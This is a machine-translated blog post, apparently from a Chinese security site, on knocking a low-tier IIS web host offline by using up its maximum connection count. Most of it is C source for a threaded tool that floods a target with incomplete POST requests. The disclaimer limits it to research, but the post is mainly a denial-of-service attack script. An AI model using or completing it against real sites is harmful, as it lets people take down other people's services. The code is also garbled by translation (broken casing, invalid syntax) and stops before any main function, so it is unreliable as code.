Using IIS maximum connection number to realize the Web site DOS (graph) _ Vulnerability Research

Security China Tip: This procedure is only used for technical research, do not use for illegal purposes, otherwise, the consequences of conceit!

Recently bought a space to play, you do not laugh, is the entry level of the virtual host (even poor AH), the various parameters are quite low, especially the number of IIS connections, only 100 (that is, support 100 different access).
There is a problem here. If I have been connected to the site, although I am the same person, but IIS is silly to each connection as a different person, each connection will assign a session to me, when the connection exceeds the server set the maximum number of IIS connections ... Oh, the denial of service is happening.
Specific attacks, of course, we use the procedure to complete. The simple idea is to keep sending HTTP requests to the Web site until the maximum number of connections is exceeded. Just on the machine has seen the shotgun HTTP protocol content lenth limit vulnerability causes denial of service attacks written by the test procedures, and today's request is very similar, take to change slightly. The specific code is as follows:

#include "Winsock.h"
#include "stdio.h"
#include "string.h"
#include "io.h"
#pragma comment (lib, "Ws2_32.lib")
#define BUFLEN 1024
#define MAXTHREADCOUNT 10//Set maximum number of threads

int threadcount=0;

struct MyData
{
Char *ip;
int port;
};


unsigned int resolve (char *name)
{
struct Hostent *he;
unsigned int ip;

if ((ip=inet_addr (name)) = = (-1))
{
if ((He=gethostbyname (name)) ==0)
return 0;
memcpy (&ip,he->h_addr,4);
}
return IP;
}


DWORD WINAPI Dos (LPVOID lpparam)
{
MyData *csdn = (mydata*) Lpparam;
struct SOCKADDR_IN server;
server.sin_family = af_inet;
Server.sin_port = htons (Csdn->port);
SERVER.SIN_ADDR.S_ADDR = Resolve ((char*) csdn->ip);
if (server.sin_addr.s_addr==0)
{

printf ("Dont Find Address%s\n", (char*) csdn->ip);
Exit (0);
}
int my;
Char buf[100]= "post/http/1.1\r\nhost:";
Strcat (buf, (char*) csdn->ip);
strcat (buf, "\r\ncontent-length:10\r\n\r\n");
My=socket (pf_inet,sock_stream,0);
if (My==invalid_socket)
{
printf ("ERROR");
Exit (0);
}
if (Connect (struct sockaddr *) & server,sizeof (server)) ==socket_error)
{
printf ("Socket error:%d", GetLastError ());
Exit (0);
}
if (Send (My,buf,strlen (BUF), 0) ==socket_error) {printf ("Error:send fail!");}
threadcount--;
return 0;
}

void Thread (char *a1, Char *a2, char *a3)
{
Static MyData tmp;
TMP.IP = A1;
Tmp.port = atoi (A2);

DWORD dwThreadID;
HANDLE Hthread;
Wsadata ws;
if (WSAStartup (Makeword (2,2), &WS)!=0)
{
printf ("[-] WSAStartup () error\n");
Exit (0);
}

Hthread = CreateThread (
NULL,//No security attributes
0,//use default stack size
Dos,//thread function
&tmp,//argument to thread function
0,//Use default creation Flags
&dwthreadid); Returns the thread identifier
if (hthread = NULL)
printf ("CreateThread failed.");
threadcount++;
Sleep (200); Delay, otherwise the CPU will be full ...
CloseHandle (Hthread);
}